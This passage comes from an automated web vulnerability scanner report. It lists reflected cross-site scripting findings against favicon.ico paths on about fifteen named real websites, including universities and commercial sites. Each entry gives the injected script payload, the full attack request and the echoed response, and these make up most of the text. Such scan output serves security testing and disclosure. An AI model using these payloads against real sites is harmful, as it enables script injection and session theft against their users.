Last-Modified: Thu, 31 Mar 2011 20:21:45 +0000
Cache-Control: public, max-age=600
Set-Cookie: SESSfa98039aa221fd92e5bcd6d7e3f1cdbb=c87b59cd4c851a0c63b943b252ee06aa; expires=Sat, 23 Apr 2011 23:55:05 GMT; path=/; domain=.thirdage.com
Vary: Cookie,Accept-Encoding
Web-Head: web07.advomatic.com
Content-Type: text/html; charset=utf-8
Content-Length: 30028
Date: Thu, 31 Mar 2011 20:21:45 GMT
X-Varnish: 1464435904
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" di
...[SNIP]...
<form action="/user/login?destination=/favicon.ico326ac"><script>alert(1)</script>0947f8fff2f" method="post" id="user-login">
...[SNIP]...

1.128. http://www.thomasnet.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thomasnet.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c5bb"><script>alert(1)</script>971346dceaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico3c5bb"><script>alert(1)</script>971346dceaf HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thomasnet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:46:39 GMT
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.7a PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: _tnetses=4d94e82f830e3; path=/; domain=.thomasnet.com
Set-Cookie: _usrvst=1; expires=Sat, 31-Mar-2012 04:00:00 GMT; path=/; domain=.thomasnet.com
Set-Cookie: tnuind=%7C; path=/; domain=.thomasnet.com
Set-Cookie: am1vst=1; expires=Sat, 31-Mar-2012 04:00:00 GMT; path=/; domain=.thomasnet.com
Set-Cookie: am1rm=PP; expires=Sat, 31-Mar-2012 04:00:00 GMT; path=/; domain=.thomasnet.com
Set-Cookie: tbv2ns=Y; path=/; domain=.thomasnet.com
Set-Cookie: tbv2showPushDown=Y; path=/; domain=.thomasnet.com
Set-Cookie: am1cmp=1; path=/; domain=.thomasnet.com
Set-Cookie: referq=deleted; expires=Wed, 31-Mar-2010 20:46:38 GMT; path=/; domain=.thomasnet.com
Set-Cookie: UUS=4d94e82f838b9; path=/; domain=.thomasnet.com
Set-Cookie: us=4d94e82f838b9; path=/; domain=.thomasnet.com
Set-Cookie: GID=G13016043995388; expires=Sat, 31-Mar-2012 04:00:00 GMT; path=/; domain=.thomasnet.com
Set-Cookie: tinid=deleted; expires=Wed, 31-Mar-2010 20:46:38 GMT; path=/; domain=.thomasnet.com
Set-Cookie: UUID=deleted; expires=Wed, 31-Mar-2010 20:46:38 GMT; path=/; domain=.thomasnet.com
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<META name="y_key" content="6e6d842e318a7ef3">
<meta name="verify-v1"
...[SNIP]...
<a href="/print/screen/favicon.ico3c5bb"><script>alert(1)</script>971346dceaf" onClick="dcsExternal('/link.html','TINCATL1=TNET&TINCATL2=CLICK_PRINTSCREEN','www.thomasnet.com');" target="print" rel="nofollow">
...[SNIP]...

1.129. http://www.totalprosports.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.totalprosports.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38e68</script><script>alert(1)</script>52c8d116fc7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico38e68</script><script>alert(1)</script>52c8d116fc7 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.totalprosports.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Thu, 31 Mar 2011 21:41:32 GMT
X-Pingback: http://www.totalprosports.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Last-Modified: Thu, 31 Mar 2011 21:41:33 GMT
Content-Length: 36468

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="en-US"><head
pr
...[SNIP]...
<script>COMSCORE.beacon({
c1:2,
c2:6685975,
c3:"",
c4:"www.totalprosports.com/favicon.ico38e68</script><script>alert(1)</script>52c8d116fc7",
c5:"",
c6:"",
c15:""
}); </script>
...[SNIP]...

1.130. http://www.tradekey.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tradekey.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a99a3'-alert(1)-'7297c590a85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.icoa99a3'-alert(1)-'7297c590a85 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tradekey.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:45:06 GMT
Server: Apache
Set-Cookie: PHPSESSID=fada60e8c5f13ede82a09627e2249e62; expires=Fri, 22-Jan-2072 21:38:26 GMT; path=/; domain=.tradekey.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 21900

<html dir=ltr>
<head>
<title>Error 404 Page not found, Business to Business marketplace, Manufacturer directory & import export</title>
<link href="http://imgusr.tradekey.com/domains/tradekey.com/t
...[SNIP]...
Date();
   var d = t.getDate() + "-" + t.getMonth()+1 + "-" + t.getFullYear();
   
   if (seconds > 1 || d == "20-01-2011")
       tk_track_ga_event('IT', 'Page Render Time - www.tradekey.com', '/favicon.icoa99a3'-alert(1)-'7297c590a85', seconds);
}
var old_load_fx = window.onload;
window.onload = function()
{
   track_page_render_time();
   if (old_load_fx)
       old_load_fx();
}
</script>
...[SNIP]...

1.131. http://www.trails.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trails.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82918'-alert(1)-'3627f2c27f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico82918'-alert(1)-'3627f2c27f6 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.trails.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 21954
Expires: Thu, 31 Mar 2011 20:31:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 31 Mar 2011 20:31:02 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=cys5mg45cynivab3aytz5n55; domain=.trails.com; path=/; HttpOnly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
ils.com',
                   jscdn: 'http://cdn2-www.trails.com',
                   logout: 'https://ssl.trails.com/logout.aspx',
                   login: 'https://ssl.trails.com/login.aspx?r=http%3a%2f%2fwww.trails.com%3a80%2ffavicon.ico82918'-alert(1)-'3627f2c27f6',
                   signup: 'https://ssl.trails.com/subscribe.aspx',
                   account: 'https://ssl.trails.com/myaccount/',
                   profile: 'http://www.trails.com/mytrails/?p=profile'
               },
               user: {
                   name:
...[SNIP]...

1.132. http://www.travelpod.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelpod.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76d64"><script>alert(1)</script>f784c90cfda was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico76d64"><script>alert(1)</script>f784c90cfda HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.travelpod.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:54:30 GMT
Server: Apache
Content-language: "
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 7980

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head> <title>Oh, Ohhh ...</title> <link rel="shortcut icon" href="/favicon.ico"/>
<script type="text/javascript">function L
...[SNIP]...
<a href="http://www.travelpod.ca/favicon.ico76d64"><script>alert(1)</script>f784c90cfda">
...[SNIP]...

1.133. http://www.tvfanatic.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tvfanatic.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcdfe"><script>alert(1)</script>1e0455e6feb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.icodcdfe"><script>alert(1)</script>1e0455e6feb HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tvfanatic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 21:30:10 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: fullsite=true; path=/; domain=.tvfanatic.com; expires=Thu, 31-Mar-2011 22:30:10 GMT
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=bas0up4uq63rsr2k8gm82n28n6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link rel="canonical" href="http://www.tvfanatic.com/favicon.icodcdfe"><script>alert(1)</script>1e0455e6feb/" />
...[SNIP]...

1.134. http://www.ucla.edu/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ucla.edu
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 391bc<script>alert(1)</script>9cb7311b8a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico391bc<script>alert(1)</script>9cb7311b8a3 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ucla.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 21:42:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 9465

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>File Not Found [UCLA
...[SNIP]...
<strong>http://www.ucla.edu/favicon.ico391bc<script>alert(1)</script>9cb7311b8a3</strong>
...[SNIP]...

1.135. http://www.uscellular.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.uscellular.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23567"%3balert(1)//7046d9ff590 was submitted in the REST URL parameter 1. This input was echoed as 23567";alert(1)//7046d9ff590 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /23567"%3balert(1)//7046d9ff590 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.uscellular.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 21:06:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP06 (build: SVNTag=JBPAPP_4_2_0_GA_CP06 date=200902191208)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=0UTmooP1sGaMfiVOlzXkkA**.a4p1; Path=/
Content-Length: 48147


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>        
       

                   <!
...[SNIP]...
SCC404ErrorPage.jsp?path=/23567";alert(1)//7046d9ff590");
   var URL= "https://vcuscc.synovate.com/uscellularfeedback/?URL=" + escape("http://10.205.186.40/uscellular/common/USCC404ErrorPage.jsp?path=/23567";alert(1)//7046d9ff590")
   //alert(URL);
   window.open(URL,"",'width='+screen.width+',height='+screen.height+',toolbar=0,location=0,directories=0,status=0,menuBar=0,scrollBars=1,resizable=0');

}
</SCRIPT>
...[SNIP]...

1.136. http://www.uscellular.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.uscellular.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript rest-of-line comment. The payload 58760</script><script>alert(1)</script>a4574d79d82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /58760</script><script>alert(1)</script>a4574d79d82 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.uscellular.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 21:06:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP06 (build: SVNTag=JBPAPP_4_2_0_GA_CP06 date=200902191208)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=5V0V3naUFLlUmwnH1On81w**.a5p1; Path=/
Content-Length: 48191


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>        
       

                   <!
...[SNIP]...
<SCRIPT type="text/javascript">

function go() {
   //alert("http://10.205.186.40/uscellular/common/USCC404ErrorPage.jsp?path=/58760</script><script>alert(1)</script>a4574d79d82");
   var URL= "https://vcuscc.synovate.com/uscellularfeedback/?URL=" + escape("http://10.205.186.40/uscellular/common/USCC404ErrorPage.jsp?path=/58760</script>
...[SNIP]...

1.137. http://www.videojug.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videojug.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d889'-alert(1)-'81287e459cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2d889'-alert(1)-'81287e459cd HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.videojug.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 20694
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: VideoJugUser=Nli9YIctzgEkAAAAOTdhMWEzYTMtN2MwMS0zNmQ4LTkxYTYtZmYwMDA4Y2RiZGZi0; expires=Sat, 30-Mar-2013 20:44:30 GMT; path=/; HttpOnly
Set-Cookie: abTest=1; expires=Thu, 28-Apr-2011 20:44:30 GMT; path=/
Set-Cookie: ASP.NET_SessionId=2ve2h1450lyv3w45swf3pyma; path=/; HttpOnly
Set-Cookie: VjPrefEd=cc=US&ed=3; expires=Sun, 31-Mar-2013 20:44:30 GMT; path=/
Set-Cookie: AuthCookie=false; expires=Sat, 02-Apr-2011 20:44:30 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 31 Mar 2011 20:44:30 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<a class="m mixFlag big UK" href="/chooseedition?ReturnURL=%2ferror%2ferror404%3faspxerrorpath%3d%252froute.ashx%252f2d889'-alert(1)-'81287e459cd&amp;NewEdition=2" >
...[SNIP]...

1.138. http://www.videosurf.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videosurf.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 839fc"><script>alert(1)</script>405c0c8ace0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico839fc"><script>alert(1)</script>405c0c8ace0 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.videosurf.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Thu, 31 Mar 2011 20:31:35 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: PHPSESSID=6eso17pubsoq98dvebsjf6d4r3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: msr=2; expires=Fri, 30-Mar-2012 20:31:35 GMT; path=/; domain=.videosurf.com
Set-Cookie: vsb=60; expires=Fri, 30-Mar-2012 20:31:35 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d94e4a7f2f46; expires=Fri, 30-Mar-2012 20:31:35 GMT; path=/; domain=.videosurf.com
Set-Cookie: luri=L2Zhdmljb24uaWNvODM5ZmMiPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD40MDVjMGM4YWNlMA%3D%3D; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<meta property="og:url" content="http://www.videosurf.com/favicon.ico839fc"><script>alert(1)</script>405c0c8ace0"/>
...[SNIP]...

1.139. http://www.vt.edu/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vt.edu
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 79bce<script>alert(1)</script>56b22d8aaa6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico79bce<script>alert(1)</script>56b22d8aaa6 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vt.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 21:48:01 GMT
Server: Apache
Status: 404
X-RouteInfo: webhost1
Content-Type: text/html; charset=UTF-8
Content-Length: 9637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<p>The requested URL /favicon.ico79bce<script>alert(1)</script>56b22d8aaa6 was not found on this server.</p>
...[SNIP]...

1.140. http://www.walletpop.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.walletpop.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcef7"><script>alert(1)</script>b3410be2129 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bcef7"><script>alert(1)</script>b3410be2129 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.walletpop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 21:00:16 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Fri, 01-Apr-2011 21:00:16 GMT; path=/
Content-Type: text/html
Content-Length: 34224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<link rel="canonical" href="http://www.walletpop.com/bcef7"><script>alert(1)</script>b3410be2129/"/>
...[SNIP]...

1.141. http://www.washington.edu/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c3e2e<img%20src%3da%20onerror%3dalert(1)>c6a0e9a058d was submitted in the REST URL parameter 1. This input was echoed as c3e2e<img src=a onerror=alert(1)>c6a0e9a058d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.icoc3e2e<img%20src%3da%20onerror%3dalert(1)>c6a0e9a058d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.washington.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:59:23 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1174
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/favicon.icoc3e2e&lt;img src=a onerror=alert(1)&gt;c6a0e9a058d</b> was not found or is no lon
...[SNIP]...
<br>
Reason: File does not exist: /www/world/favicon.icoc3e2e<img src=a onerror=alert(1)>c6a0e9a058d.</br>
...[SNIP]...

1.142. http://www.whattoexpect.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.whattoexpect.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee44c'%3b15cff5da24b was submitted in the REST URL parameter 1. This input was echoed as ee44c';15cff5da24b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.icoee44c'%3b15cff5da24b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.whattoexpect.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 File Not Found
Date: Thu, 31 Mar 2011 21:51:59 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB14
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: LoggedIn=; expires=Wed, 30-Mar-2011 21:51:59 GMT; path=/
Set-Cookie: .ASPXANONYMOUS=Acwmf7NK*3kyYjk2MDgwMC1mOTQ3LTRhMTktYmYwMy1lZmEyNzhiMjU5NTg1; expires=Thu, 09-Jun-2011 08:31:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=sk3laiylvmi1pe554dwlloyk; path=/; HttpOnly
Set-Cookie: WTEINTERSTITIAL2=CNDIFENP=10&CNDIFNS=12&CNDIT=Display&CNDIENP=3; domain=whattoexpect.com; path=/
Set-Cookie: WTEINTERSTITIAL=CNDI=Y&CNDIFENP=10&CNDIFNS=12&CNDIT=Display&CNDIENP=5; domain=whattoexpect.com; path=/
